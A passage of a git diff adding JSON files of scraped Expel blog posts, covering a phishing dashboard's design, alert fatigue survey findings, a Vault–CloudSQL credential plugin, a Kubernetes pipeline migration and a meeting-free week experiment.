challenges it presented. When our customers let us know that they were drowning in phishing emails, we created the Expel Managed Phishing Service . So, in addition to our analyst providing 24\u00d77 managed security, they\u2019ll also have eyes on every single email someone at your org reports as a potential phishing attempt. While we can\u2019t stop attackers from being cunning, we can use our expertise (as a community) to help each other not only keep our heads above water but also prevent getting blindsided again. Check out Expel Managed Phishing" +} \ No newline at end of file diff --git a/cloud-security-archives.json b/cloud-security-archives.json new file mode 100644 index 0000000000000000000000000000000000000000..f712c7b8c2dec4c25fdbb9682b6ed63af3f0520b --- /dev/null +++ b/cloud-security-archives.json @@ -0,0 +1,6 @@ +{ + "title": "Cloud security Archives", + "url": "https://expel.com/blog/resource_topic/cloud-security/", + "date": null, + "contents": null +} \ No newline at end of file diff --git a/come-sea-how-we-tackle-phishing.json b/come-sea-how-we-tackle-phishing.json new file mode 100644 index 0000000000000000000000000000000000000000..03d09f16a897dadb73b2ca81f3651f78a6b4b476 --- /dev/null +++ b/come-sea-how-we-tackle-phishing.json @@ -0,0 +1,6 @@ +{ + "title": "Come sea how we tackle phishing", + "url": "https://expel.com/blog/expel-phishing-dashboard/", + "date": "Jun 8, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Come sea how we tackle phishing: Expel\u2019s Phishing dashboard Security operations \u00b7 7 MIN READ \u00b7 KELLY NAKAWATASE \u00b7 JUN 8, 2021 \u00b7 TAGS: Phishing / Tech tools It\u2019s tough to stay afloat when you\u2019re drowning in phishing emails. While it\u2019s great that users are submitting suspicious-looking emails, you need to be able to glean meaningful information from all the data in those suspicious submissions. But how? And with what time? Our crew wanted to find a way to quickly show our Expel managed phishing service customers helpful data like who is attacking them, how often they\u2019re being attacked and whether or not their phishing training program is effective. Let\u2019s connect And this is where I come in. (Hi, I\u2019m Kelly, one of Expel\u2019s senior UX designers. I designed the Phishing dashboard.) In this post, I\u2019m going to talk (type?) you through the UX process that went on behind the scenes in creating the Expel Phishing dashboard \u2013 from figuring out which metrics would be the most useful for our customers to determining the right visualization for any given set of data. If you\u2019re developing a measurement framework for your own phishing program \u2013 or are just interested in learning how I created a dashboard centered on the goals of our users \u2013 you\u2019ll want to keep reading. Whale, what does the Expel managed phishing service do? Perfect meme, courtesy of the internet TL;DR: We triage and investigate the emails customers of our managed phishing service report as potential phishing. At its base, users submit suspicious looking emails to us so our SOC analysts can triage the email and determine whether or not the submission is benign or malicious. If the email is deemed malicious, our analysts do the legwork to figure out if there was an actual compromise, and if there was a compromise, we inform you and provide instructions to remediate the situation. If the email had malicious intent but users didn\u2019t fall for it, then our analysts conclude their investigation and offer recommendations to help improve overall security to ensure no one does fall for it in the future. Casting a net for goals I joined the phishing team in its infancy, and as a UX designer here at Expel, my job is to ensure that we keep our customers\u2019 goals top of mind when we create products. So, I started by asking questions: What\u2019s the purpose of this dashboard? What would customers be most interested in seeing on the dashboard? How often would they use it? How would they use it? Also a lot more questions. I talked to a few of our phishing proof of concept customers to get answers to these questions. I also talked to a few of our Engagement Managers (EMs), who are very in tune with what customers as a whole are generally trying to accomplish. These conversations helped me discover what our customers wanted to be able to do with their phishing programs, what holes they saw in other services. After a number of informational interviews, I formed four goals for the Phishing dashboard. Help customers report up to their executives on the state of phishing at their organization. Help train users who report the most false positives, and reward users who are great at catching phish! Identify oppor-tuna-ties to improve overall security and prevent future phishing. Show customers what they can expect to see. It\u2019s likely that if they\u2019re interested in our phishing service, they\u2019ve used other phishing-related apps to bulk up their program. If they\u2019re used to getting certain kinds of metrics around phishing, I wanted to make sure that the first iteration of our Phishing dashboard met that baseline at the very least so customers would never feel like they\u2019re lacking by just working with us. Deep diving for metrics I wanted to see what other products in the phishing space were doing when it comes to serving metrics, in order to design effectively. So, I looked at the ocean of phishing apps and software, combed through public product documentation and YouTube videos, and took inventory of all the metrics these products were showing on their dashboards and reporting. I compared these metrics to the ones we were already collecting for our proof of concept customers. Before I condensed this list and got rid of the duplicates, there were 132 data points. But, like I said, that was before getting rid of duplicates. And there were actually a lot of duplicates. So, I did the classic UX method of a good ol\u2019 analog card sort. Basically, I wrote every single metric (even the duplicates) onto a Post-It Note and grouped them by category. I did this a few times to get different kinds of groups. Then I grouped these metrics based on the goals I mentioned above. Photo of my analog card sort and my shadow self These were some of the metric categories I came up with. But it\u2019s actually not my opinion that matters the most here. Remember, our customers are the ones I have to keep in mind when designing. After condensing the list of metrics down to a manageable number, I was able to run an unmoderated, completely remote card sort with a customer and EMs to see how they\u2019d use these metrics, and if there were any metrics they thought were unnecessary or missing. I\u2019m proud to say that the categories these users came up with were quite similar to my own. Reeling it in for feasibility and tackling visualizations Once I had a shorter list of metrics and categories that would meet the goals for the Phishing dashboard, I knew I\u2019d have to reel it in based on time and technical feasibility. So, I met with the phishing engineers to discuss which items on the metrics list were realistic for a first version, and which metrics we\u2019d have to revisit for a later version. I let go of more complicated metrics like susceptibility by department and phish category (it\u2019s bookmarked for a future version though\u2026 maybe don\u2019t quote me ). But capturing key baseline metrics \u2013 being able to collect data and list out most common subjects, attachments, users and user accuracy \u2013 was definitely feasible. The next step was figuring out how to most effectively visualize these metrics. I looked at popular dashboard designs, aesthetically pleasing dashboards and whatever showed up in \u2018best dashboards\u2019 searches. I blocked out their visualizations to understand ideal page layout, the kinds of metrics and visualizations that got prioritized, and what kind of visual weight is given to any particular graph. You can\u2019t really just take a metric category and throw it into a pie chart and call it done. So much of good design in dashboards is finding the right visualization for the right group of metrics to tell the story that your users need. For example, a group of metrics I knew we needed to show were: Total user submissions for a given timeframe, How many of those submissions were malicious; and How many of those submissions were benign. It seemed like the most obvious visualization for this group would be to put it in a pie chart that shows the quantities in each metrics group and how they make up the whole of total submissions. Or maybe the most obvious visualization is to just show the raw counts of these numbers, or in a funnel, like our Workbench\u2122 Alerts Analysis Dashboard funnel. Example of straight counts, and adapting these metrics into graphics on our Workbench Alerts Analysis Dashboard But in talking to customers, I already knew that the straight quantity of submissions and their subsequent outcomes wasn\u2019t the interesting part of this data. In fact, showing straight quantities for this might be the least informative way of expressing this data. The story is what\u2019s important here. Below is what ended up being the final version of this data visualization, and it offers so much more information than a pie chart could. Customers are more interested in looking at how the outcomes of their suspicious emails trend, and whether or not there\u2019s a spike. If there\u2019s a spike, then you can investigate why there was a spike. You can interact with the legend to turn on and off certain outcomes, compare the lines and easily screenshot this for reports. Example of Expel Phishing Dashboard line graph Once I did this for all of the metric groupings that would appear on the Phishing dashboard, I laid it out and started chumming for feedback from current customers. And, wahoo! The feedback was largely positive, and I made some adjustments to wording and changes to which graphs got to be the principal in the school of visualizations. All aboard the Phishing dashboard tour Let\u2019s walk through the Expel Phishing dashboard 1.0. Reminder: if you\u2019re already an Expel customer, don\u2019t be koi, you can preview and interact with this krill-iant dashboard in Workbench! The image below shows submissions by outcome over time, which is what customers first look for upon landing here. You can look for spikes and trends in the data. On the right, we have some information on malicious senders and how many emails are sent per sender. We also have the number of unique submitters so customers can see how many of their users are reporting emails as potentially phishy. This can be an indicator for how effective training or end user education is. Expel Phishing Dashboard top level metrics of submissions over time and unique senders and submitters Moving down the dashboard, second level on the left, we have a horizontal bar chart. This gives customers information about how many submissions we\u2019re receiving from their users, and how many of those submissions turn into actual security incidents. On the right, we have information on the frequent submitters of malicious, benign, and all email submissions to give customers insight into which users may need more training. Metrics displaying how submissions funnel down to incidents, and submitter leaderboards In the next image, on the third level on the left, we show customers the kinds of attachments that show up in malicious emails. This helps customers create custom rules in their secure email gateway (SEG) to limit similar incoming emails. On the right is how often we use customer integrated technology to assist in our phishing investigations. This is to give customers an idea of their return on investment in their security vendors. Information on malicious attachment quantity and how often our analysts leverage your tech in phishing investigations Lastly, along the same vein as malicious attachments, we have frequent domains, senders and sender domains. This can help customers not only create rules in their SEG to limit incoming emails, but can also help them see if there\u2019s a themed campaign against their org. The final metrics on the Phishing dashboard provide information about recurring themes in malicious emails Hook, line, and sinker Of course, that\u2019s not the end of my job, or the end of the Phishing dashboard. After all, this is only version one. Bird\u2019s eye view of the primary Phishing dashboard mockup The Expel Phishing dashboard is on its maiden voyage, and I hope you enjoyed swimming alongside me. I\u2019m excited to be on this journey with our Expel managed phishing customers and the rest of the Expel crew. Want to see where we take the dashboard next? Hop aboard!" +} \ No newline at end of file diff --git a/companies-with-250-1000-employees-suffer-high-security.json b/companies-with-250-1000-employees-suffer-high-security.json new file mode 100644 index 0000000000000000000000000000000000000000..b2b48cfad5f0fa0d28d4753ff0b01109facfe76d --- /dev/null +++ b/companies-with-250-1000-employees-suffer-high-security.json @@ -0,0 +1,6 @@ +{ + "title": "Companies with 250-1000 employees suffer high security ...", + "url": "https://expel.com/blog/companies-with-250-1000-employees-suffer-high-security-alert-fatigue/", + "date": "May 2, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Companies with 250-1,000 employees suffer high security alert fatigue Security operations \u00b7 3 MIN READ \u00b7 CHRIS WAYNFORTH \u00b7 MAY 2, 2023 \u00b7 TAGS: Careers / MDR In our recent report on cybersecurity in the United Kingdom (UK) , IT decision-makers (ITDMs) point to a corrosive dynamic threatening the effectiveness of their security operations centres (SOCs) and the well-being of their security and IT teams. In sum, fatigue stemming in large part from a barrage of alerts and false positives is disrupting workers\u2019 private lives, driving burnout and staff turnover at a time when there\u2019s a critical talent shortage in the industry. The effect is evident across the board, but companies with 250-1,000 employees (what Expel calls the commercial segment) are being hit especially hard. Let\u2019s review the findings and consider possible reasons why the 250/1k segment is suffering so badly. Regardless of these findings, we believe there\u2019s hope. At the end, we\u2019ll discuss strategies to help businesses not only survive, but thrive in this environment. Fatigue and burnout is worst for companies with 250-1,000 employees More than half of ITDMs say their SOCs spend too much time on alerts , with larger companies (250+) more likely to call it out as a particular concern. (Problem alerts include low-risk/low priority notifications and false positives.) Respondents in the 250/1k segment were most likely to say their teams spend too much time addressing alerts (60%). This segment also views the issue as more urgent, with a quarter saying they strongly agree. ITDMs in the 250/1k segment are also significantly more likely to cite alert fatigue as a problem for their security teams. The risk associated with fatigue is huge. As we noted in the UK report, an International Data Corporation (IDC) study found that a dizzying number of alerts are ignored\u201427% among companies with 500-1,499 employees (which includes a big chunk of the segment we\u2019re examining here). This revelation\u2014that more than a quarter of threat alerts hitting the SOC are being ignored\u2014should keep leaders and board members awake all night, every night. Alert fatigue and the 3CX hack In the recent 3CX attack, many of the platform\u2019s users had seen their endpoint protection software incorrectly flag known, good software as malicious in the past. Since 3CX\u2019s software was expected in their environment, many analysts assumed the endpoint protection software was incorrect, rather than suspecting the software had been the victim of a supply chain attack. \u2013 Greg Notch, Chief Information Security Officer, Expel Alert fatigue and burnout: the human toll Alert overload, alongside all the other challenges associated with running a 24/7 SOC (during an era plagued by a 3.4 million-person talent shortage ), represents an unsustainable infringement on security pros\u2019 personal lives. Ninety-three percent of ITDMs surveyed (and 95% in the 250/1k category) say their personal commitments are at least occasionally cancelled, delayed or interrupted because of work. But, as chart 3 indicates, the 250/1k group is affected significantly more often\u201451% of respondents say it happens all or most of the time, a stunning 15% more than the next highest segment. Unsurprisingly, then, ITDMs in this key segment say their groups experience substantially higher degrees of burnout \u201414% higher than the ITDM total. Staff turnover The upshot here is that burned-out workers make mistakes (like the missed alerts that happened in the 3CX supply chain attack) or leave (perhaps both). The potential for attrition is especially distressing, given the talent deficit noted above. Again, companies in the 250-1,000 employee range feel the crush worse than those in other segments. This cohort feels a greater intensity on this measure than other respondents. Its 27% positive response is eight points higher than the all-segment average. Why are companies with 250-1,000 employees having a harder time than other segments? Greg Notch, Expel\u2019s chief Information security officer (CISO), says these companies are \u201cbig enough to have big company problems, but lack the structure and funding to build a security program sufficient to defend their enterprise.\u201d The folks trying to keep those programs afloat are understaffed, so they\u2019re naturally burning out. Also, because they\u2019re stuck doing repetitive work just to keep the lights on, it\u2019s preventing their career growth into more strategic roles. So they leave to find those opportunities elsewhere. And it\u2019s easy for them to do that because of the talent shortage. He also says it \u201cdoesn\u2019t help that ransomware targeting is now going wider and down-market. As a result, these folks are in live-fire situations with bad business outcomes.\u201d The UK security report makes a couple of things clear. First, SOCs are under tremendous stress as they try to safeguard their organisations, and if CISOs and their teams feel overwhelmed the data illustrates why. Second, the pressure is substantially worse for IT/security teams in organisations with 250-1,000 employees. And now, the good news Given the dramatic worldwide talent shortage, it\u2019s na\u00efve to imagine that all organizations can find and afford the people needed to build and run their own SOCs. Managed detection and response (MDR) addresses these problems. MDRs are fully-managed, 24/7 services staffed by experts who specialise in detecting and responding to a wide range of cyberattacks, including phishing, ransomware, and threat hunting. By marrying human expertise to advanced technologies, MDR analysts can detect, investigate, neutralise, and remediate advanced attacks. This eliminates an organisation\u2019s need for a large staff. The best MDRs relentlessly research the latest hacker tactics and develop advanced tools to process massive amounts of data and automatically sort signal from noise\u2014meaning a company\u2019s analysts see the important alerts, not all the alerts. The list of benefits goes on, but the bottom line is that, for many organisations, MDR means broader, deeper, more sophisticated cyberdefense (and fewer headaches) for less money. If any of this sounds relevant for your business, we encourage you to review the full report and drop us a line ." +} \ No newline at end of file diff --git a/connect-hashicorp-vault-and-google-s-cloudsql-databases.json b/connect-hashicorp-vault-and-google-s-cloudsql-databases.json new file mode 100644 index 0000000000000000000000000000000000000000..939ea710332ba8c864d811db36483dea4526b41b --- /dev/null +++ b/connect-hashicorp-vault-and-google-s-cloudsql-databases.json @@ -0,0 +1,6 @@ +{ + "title": "Connect Hashicorp Vault and Google's CloudSQL databases", + "url": "https://expel.com/blog/connect-hashicorp-vault-and-googles-cloudsql-databases-new-plugin/", + "date": "Aug 31, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Connect Hashicorp Vault and Google\u2019s CloudSQL databases: new plugin! Engineering \u00b7 3 MIN READ \u00b7 DAVID MONTOYA AND ISMAIL AHMAD \u00b7 AUG 31, 2022 \u00b7 TAGS: Cloud security / Tech tools We take protecting credentials seriously, and database (DB) credentials are no exception. They\u2019re juicy targets for attackers and often hold the keys to all your sensitive information. Making sure they\u2019re short-lived, rotated, scoped, auditable, and aligned with zero trust principles is central to boosting an organization\u2019s security posture. As you may know from our previous post, 5 best practices to get to production readiness with Hashicorp Vault in Kubernetes , we\u2019re long-time users of Vault, which specializes in credential management and offers a large plugin ecosystem for different databases. Sounds like a slam dunk right? Not so fast. As we began to explore using Vault to manage credentials for our Google-managed CloudSQL instances, we found ourselves stuck between two less-than-ideal out-of-the-box options, forcing us to compromise on operational complexity or, worse, security. Caught between a rock and a hard place, we dug deeper and built a new tool to meet our requirements. We think it\u2019s broadly useful for organizations using Vault and Google CloudSQL. And now, the good news: Expel is excited to open source a new Hashicorp Vault plugin. It brokers database credentials between Hashicorp Vault and Google\u2019s CloudSQL DBs and it doesn\u2019t require direct database access (via authorized networks ) or that you run Google\u2019s CloudSQL auth proxy. If you\u2019re wondering how that\u2019s possible, the plugin uses Google\u2019s best practice for authentication via IAM rather than a standard database protocol. Sound like something you could use? The plugin codebase can be found in GitHub . Why build a custom plugin? To better understand why we built this plugin, let\u2019s look at some of the challenges posed by using Vault\u2019s default database plugins to connect to CloudSQL instances. Per Google\u2019s documentation , there are two primary ways of authorizing database connections. Option 1: use CloudSQL authorized networks Google allows users to connect to CloudSQL databases using network-based authentication. To improve the security posture of your DB, Google recommends enabling SSL/TLS to add a layer of security. This requires users to manage an allowlist of IP CIDRs and SSL certificates on both the servers and clients for the databases they wish to connect to. As you can see, this gets tedious quickly. Imagine you have hundreds of CloudSQL databases\u2026 no one wants to manage that many firewall rules or certificates. Option 2: use CloudSQL Auth proxy Google\u2019s recommended approach for connecting to CloudSQL instances is to use the Auth proxy . Its benefits include: Uses IAM authorization instead of network-based access control (no more firewall rules!) Automatically wraps all DB connections with TLS 1.3 encryption regardless of the database protocol As we started exploring approaches for connecting our Vault instances to CloudSQL databases, we contemplated using the cloudsql-proxy (but shuddered at the operational complexity of running such a specialized sidecar along with our Vault servers). Developing a Hashicorp Vault plugin So, how exactly did we end up writing our own Vault plugin? As we researched options, we landed on a GitHub issue that referenced an interesting new Go connector for CloudSQL . The Google Cloud team had recently released a generalized Go library for authenticating to CloudSQL databases the same way that their auth proxy does. Being Go developers, our interest really piqued\u2013could we use this new library to get the best of both worlds (low operational complexity and security best practice)? By creating a new Vault plugin based on Google\u2019s Go connector, we were able to integrate Vault with CloudSQL databases all while taking advantage of Vault\u2019s existing capability to create and manage database credentials. The plugin simply initiates the database connection using the new Go connector for CloudSQL instances and then delegates everything else to the community-supported Vault database plugin. How to use it Ok so you\u2019ve made it this far. You understand what problem the plugin is solving and how it\u2019s solving it. Now let\u2019s talk about how you use it. A step-by-step guide to building and deploying this plugin can be found here . Conclusion Although \u201cbuilding a new way\u201d often seems daunting, our journey with Vault and CloudSQL was rewarding and we hope our plugin will be useful to others facing similar issues. As we continue our journey, watch this space for future posts describing how to employ Vault as a database credential broker for workloads and audit across the stack. Finally, have a look: we\u2019ve posted a step-by-step guide on GitHub detailing how to set this up in your environment." +} \ No newline at end of file diff --git a/containerizing-key-pipeline-with-zero-downtime.json b/containerizing-key-pipeline-with-zero-downtime.json new file mode 100644 index 0000000000000000000000000000000000000000..c110e61c962293521ca7cdbd12dc6ff8743de8ac --- /dev/null +++ b/containerizing-key-pipeline-with-zero-downtime.json @@ -0,0 +1,6 @@ +{ + "title": "Containerizing key pipeline with zero downtime", + "url": "https://expel.com/blog/containerizing-key-pipeline-with-zero-downtime/", + "date": "Feb 23, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Containerizing key pipeline with zero downtime Engineering \u00b7 8 MIN READ \u00b7 DAVID BLEWETT \u00b7 FEB 23, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools Running a 24\u00d77 managed detection and response (MDR) service means you don\u2019t have the luxury of scheduling downtime to upgrade or test pieces of critical infrastructure. If that doesn\u2019t sound challenging enough, we recently realized we needed to make some structural changes to one the most important components of our infrastructure \u2013 Expel\u2019s data pipeline, and the processing of that data pipeline. Our mission was to migrate from a virtual machine (VM)-based deployment to a container-based deployment. With zero downtime. Let\u2019s connect How did we pull it off? I\u2019m going to tell you in this blog post. (Hi, I\u2019m David, Expel\u2019s principal software engineer.) If you\u2019re interested in learning how to combine Kubernetes, feature flags and metric-driven deployments, keep reading. Background: Josie\u2122 and the Expel Workbench\u2122 In the past year at Expel, we\u2019ve migrated to Kubernetes as our core engineering platform (AKA the thing that enables us to run the Expel Workbench). What\u2019s the Expel Workbench? It\u2019s the platform we built so that our analysts can quickly get all the info they need about an alert and make quick decisions on what action to take next. In addition to some other very cool things. Want to see it in action? Get a free two-week trial of Expel Workbench for AWS Back to Kubernetes. While known for its complexity (who here likes YAML?), Kubernetes comes with a large amount of functionality that can, if used correctly, result in elegant solutions. Full disclosure: I\u2019m not going to dive into all the things we do with Kubernetes, or what is Kubernetes for that matter. Instead, I\u2019m going to focus specifically on our data pipeline and detection engine (we call her Josie). Our detection pipeline receives events (or logs) and alerts from our customer\u2019s devices and cloud environments. Then, our detection engine processes each alert and decides what to do with it. We have some fundamental beliefs about detection content and our pipeline: Never lose an alert; Quality and scale aren\u2019t mutually exclusive; The best ideas come from those closest to the problem; and Engineering builds frameworks for others to supply content. This means our detection pipeline is content-driven and can be updated by our SOC analysts here at Expel. We also hold the opinion that content should never take a framework down. If it does, that\u2019s on engineering, not the content authors. With these beliefs in mind, we were faced with the challenge of making structural changes to how we are running our detection engine, ensuring quality, not losing alerts and still enabling analysts to drive the content. Josie\u2019s journey to Kubernetes What we knew Ensuring this migration didn\u2019t disrupt the daily workflow of the SOC was key. Just as important was not polluting metrics used for tracking the performance of the SOC. That\u2019s why we wanted an iterative process. We wanted to run both pipelines in parallel and compare all the performance metrics and output to ensure parity. We also knew we wanted to be able to dynamically route traffic between pipelines, without the need for code-level changes requiring a build and deploy cycle. This would allow us to atomically re-route and have that change effective as quickly as possible. The final requirement was to retain the automated delivery of rule content. While the existing mechanism was error-prone, we didn\u2019t want to take a step backward here. Tech we chose We were already moving our production infrastructure to Kubernetes. So we took full advantage of several primitives in Kubernetes, including Deployments , ConfigMaps and controllers . We chose LaunchDarkly as a feature flag platform to solve both the testing in production and routing requirements. Their user interface (UI) is the icing on the cake \u2013 tracking changes in feature flag configuration as well as tracking flag usage over time. The real-time messaging built into their software development kit (SDK) enabled us to propagate flag changes on the order of hundreds of milliseconds. Preparing Josie for her journey If you\u2019ve read our other blogs, you\u2019ll know that Expel is data-driven when it comes to decision making. We rely on dashboards and monitors in DataDog to keep track of what\u2019s happening in our running systems on a real-time basis. Introducing a parallel pipeline carries the risk of polluting dashboards by artificially inflating counts. To mitigate this, we added tags to our custom metrics in DataDog . After the new tag was populated by the existing pipeline, we added a simple template variable , defaulting to filter to the current rule engine. This ensured that existing users\u2019 view of the world was scoped to the original engine. It also enabled the team to compare performance between the parallel pipelines in a very granular way. We then updated monitors to include the new tag, so they alerted separately from the old engine. The next step was to add gates to the application that would allow us to dynamically shift traffic between rule engines. To do this, we created two feature flags in LaunchDarkly: one to control data that is allowed into a rule engine and one to control what is output by each engine. Finally, we set up a custom targeting rule that considered the customer and the rule engine name. Initial: Kubernetes Once the instrumentation and feature flags were functional, we began setting up the necessary building blocks in Kubernetes. When setting up pipelines, I try to get all the pieces connected first and then iterate through the process of adding the necessary functionality. So, we set up a Deployment in Kubernetes. A Deployment encapsulates all of the necessary configuration to run a container. To simplify the initial setup, we had the application connect to the Detections API service on startup to retrieve detection content. This microservice abstracts our detection-content-as-code, giving programmatic access to the current tip of the main branch of development. Note that we configured the LaunchDarkly feature flags before turning on the deployment. The first flag controlled whether or not this instance of the detection engine would process an incoming event from Kafka. This flag allowed us to start with a trickle of data in the new environment, and gradually ramp up the volume to test processing load in Kubernetes. The second flag controlled whether this version of Josie would publish the results of the analysts\u2019 rules to the Expel Workbench. This allowed us to work through potential issues encountered while getting the application to function in the new environment, without fear of breaking the live pipeline and polluting analyst workflow. You can see the diagram I created to help visualize the workflow below. LaunchDarkly feature flags control flow Load Testing Once the new Deployment was functional inside Kubernetes, we began a round of load testing. This was critical to understand the base performance differences between the execution environments. We performed the load testing by first enabling ingress for all data into the new detection engine, but kept egress turned off. We then rewound the application\u2019s offset in Kafka. The data arrived in the rule engine and performed processing, but any output would be dropped on the floor. The processing generated the same level of metric data that the live system did, so we could compare key metrics such as overall evaluation time, CPU usage and memory usage. LaunchDarkly feature flags control flow Output Validation While we iterated through the load test, we also tested the data that was output by the new system. We pulled this off by tweaking the feature flag targeting rule to allow egress for the new detection engine for a specific customer. We chose an internal customer so that we could see the output in the Expel Workbench, but not disrupt our analysts. We triggered alerts for this customer then checked to see if each alert was duplicated, and if the content of each duplicated alert was identical. LaunchDarkly feature flags control flow Rule Delivery Once we were sure the new execution environment was capable of processing the load as well as generating the same output, we began to tackle the thorny problem of how to deliver the rule content. At Expel, our belief in infrastructure-as-code extends to the rules our SOC analysts write to detect malicious activity. The detection content is managed in GitHub, where changes go through a pull request and review cycle. Each detection has unit tests that run through CircleCI on every commit. Getting detection content from GitHub to the execution environment is tricky. The body of rules is constantly changing, and the running rule engine needs to respond to those changes as quickly as possible. Previously, when a pull request was merged, delivering the updated rule content involved kicking off an Ansible job that would perform a series of operations in the VM, and then restart processes to pick up the change. The entire process from pull request merge to going live could take as long as 15 minutes. Not only that, there wasn\u2019t much visibility into when those operations failed. That\u2019s when we asked: Could Kubernetes help us improve this process? The team wasn\u2019t happy with the direct network connection on startup behavior, mainly because it introduced a point of failure and rule changes weren\u2019t captured after startup. After talking with our site reliability engineering (SRE) team, we decided that the Detections API should store a copy of the rule\u2019s content in a Kubernetes configmap. We then updated the Kubernetes Deployment to read the ConfigMap contents on startup. This decoupled the application from the network so that service failures in Detections API would not break the rule engine. But this introduced the possibility of a few other failure modes. If the saved rule content was not getting updated correctly, the running engine could be stuck running stale versions of the rule definitions. One possible cause of this is the size limit on ConfigMaps. Fortunately, addressing these possible failure modes was fairly straight forward. We used monitors in DataDog. We made use of a reloader controller to react to changes in the ConfigMap. This controller listens for changes in the ConfigMap and triggers an update to the Deployment. When Kubernetes sees this change in the Deployment, it initiates a rolling update . This process ensures that the new pods start successfully, then spins down the old pods. With both of these changes in place, we arrived at a solution that simplified the operation of the system and allowed it to react to changes in rule content faster than the original implementation. Below is a diagram of the entire process. Expel containerized rule engine Live Migration With the new Deployment performing well and responding to rule changes, we were ready to shift live processing from the old system to the new. We decided to do a phased rollout. We started with a small subset of our customer base, turning egress off in the old implementation and on in the new. We allowed the system to run for a couple of days, and then slowly increased the number of customers routing to the new system. After a few more days, we shifted all customer egress to the new pipeline and turned off egress on the old one. We kept the old system running in parallel so that if we encountered any discrepancies or problems, we could easily flip back to it. After letting both run in parallel for a week, we decommissioned the legacy VM system. LaunchDarkly feature flags control flow What this means for developers Large-scale change to a critical business component is a daunting task. Throughout the process, we made sure to keep both the SOC and leadership in the loop. You\u2019ve probably seen us mention the importance of communication a few times. Regular communication during each phase, especially the planning phases, was critical. We needed to learn about the key dashboards and monitors in play. This also helped us mitigate the risk of having to answer to an angry SOC. Here are some tips based the lessons we learned along the way: LaunchDarkly provides a rich set of feature flags. While it provides a richer feature set than what we took advantage of, we were able to deploy code live but control execution at a very granular level through the use of feature flags. Our main goal here was to know in advance which subset of customers would be processed by which engine so that their associated engagement managers could be prepared for questions. Adopt observability. Our investment in being driven by metrics paid dividends here. The existing DataDog dashboards were comprehensive and we easily compared both systems simultaneously. We also leveraged the existing corpus of monitors by adjusting their targets to take an additional label into account. Don\u2019t overlook the primitives available in Kubernetes. They gave us the flexibility to respond to content changes at a much faster pace, and with greater visibility. While Kubernetes does support live reloading of configmap content, the current iteration of the engine doesn\u2019t take advantage of it. Our plan was to dynamically reload rule content in the running pod, instead of restarting on change. This alleviated hot-spots around waiting for Kafka partition ownership to settle, further decreasing the time it took for detection content to go live. I hope that this post helped give you some ideas and maybe even saved you some time problem solving. Want to play around with some of the things we\u2019ve built? Check out the Expel Workbench\u2122 for AWS ." +} \ No newline at end of file diff --git a/could-you-go-a-week-without-meetings-at-work.json b/could-you-go-a-week-without-meetings-at-work.json new file mode 100644 index 0000000000000000000000000000000000000000..74a8ddc4088bb01ebd0762b09e90426db147b312 --- /dev/null +++ b/could-you-go-a-week-without-meetings-at-work.json @@ -0,0 +1,6 @@ +{ + "title": "Could you go a week without meetings at work?", + "url": "https://expel.com/blog/week-without-meetings/", + "date": "Dec 8, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Could you go a week without meetings at work? Talent \u00b7 3 MIN READ \u00b7 LAURA KOEHNE \u00b7 DEC 8, 2020 \u00b7 TAGS: Company news / Employee retention / Guide Wait\u2026what!? If you felt your stomach tighten in horror, followed quickly by a thrill up your spine at the idea of a whole week without meetings, you\u2019re not alone. Many Expletives felt the same as we prepared for our first Week Without Meetings in September. Eliminating all internal meetings for a week is a bold move, one designed to shock the system and make us more intentional about our meeting choices. The experiment paid off by increasing flexibility, and giving us the space and energy we needed. Want to try this at your company? Here are some lessons learned at Expel and tips for how your company can do it too. Why a week without meetings First, why\u2019d we do it? As school started, we\u2019d heard from parents and caregivers that what was needed most was flexibility to do work at a time when they personally had fewer distractions, along with fewer meetings. And we generally agreed that meeting-stuffed days, with hours on Zoom, were draining and left little time for individuals to do work and, even more important, work on strategic projects. We wanted to change Expel\u2019s meeting culture: Reducing the number of meetings (yes!) while improving the value of remaining meetings and encouraging more asynchronous collaboration. Pro tip: Before scheduling a week without meetings, define specific objectives for your program. It\u2019s not enough to just stop meeting for a week. You\u2019ll want to use the pause created by this event to support long-term behavior changes that meet your objectives. Expel focused on these behaviors: Being intentional about the decision to have a meeting Making the meetings we do have more productive Using asynchronous collaboration to work together more flexibly Getting feedback on our meetings for continuous improvement Here\u2019s a quick decision tree we created to help employees decide whether or not they needed to schedule a meeting: Meeting decision tree adapted from Real Life E Time Coaching and Training But why actually stop meetings? Eliminating all internal meetings for the whole week may seem drastic, but sometimes when you\u2019re after urgent, collective behavior change you need a big gesture. We wanted to catch attention immediately, to build awareness and have all Expletives experience the positive benefits of having fewer meetings first-hand, together. Plus, we couldn\u2019t very well schedule a meeting to talk about reducing meetings, could we? (Although, to be honest, those of us planning it met a lot while working out the details\u2026go figure!) How did you pull it off? A Week Without Meetings gave us the \u201cloud pause\u201d we needed to slow down and become more selective about our meeting habits. Here are the steps we took at Expel to prepare our people for a week without meetings (you can use these tips, too): Give several weeks advance notice so people can reorganize their schedules. Provide clear guidance and explicit permission for making decisions about which meetings to schedule and accept. (Our goal was to eliminate all internal meetings. Some meetings stayed: customers, of course, and a few managers met with job candidates or onboarded new hires. The point is to discern what can only be done in a meeting.) No meetings doesn\u2019t mean no work. Depending on what you\u2019re trying to do, there are plenty of ways to collaborate outside of meetings . Help your team use the tools available to them. Help managers prepare their teams for Week Without Meetings. Discuss strategies for communicating and maintaining forward momentum for the week. Is that all? Remember, the week itself is part of a behavior change initiative that started before the big event, and continues to this day. Some other keys to our success include giving every Expel manager a chance to weigh in on the idea before it launched; preparing managers with talking points and tools to use with their teams; providing all Expletives with learning resources to support the changes (see a selection on sidebar) and continued reinforcement of key concepts by executives who share their \u201cmeeting mojo\u201d with our company weekly. Would you do it again? Absolutely! In our first Week Without Meetings, many Expletives reported a noticeable increase in energy because they had more time to focus on getting work done. Interestingly, a good number said they became more engaged in their work. Overall we found the experience so beneficial, Expel just completed a second Week Without Meetings in November and plans to continue this tradition quarterly. Here are some key themes from the feedback in September: Week Without Meetings impact If you\u2019re going to implement your own Week Without Meetings, have a mechanism for gathering feedback asynchronously during that time. Share it at the start of the week and encourage people to post observations and ideas as they have them. Expel uses a \u201chotwash\u201d document that asks what\u2019s going well, \u201cmeh\u201d and badly. Derived from the hotwash, the bubbles above are keyed like a stoplight (green = good) and the size indicates the relative volume of comments by theme. A final word If an idea brings up a knee-jerk \u201cNo way!\u201d follow it up with a 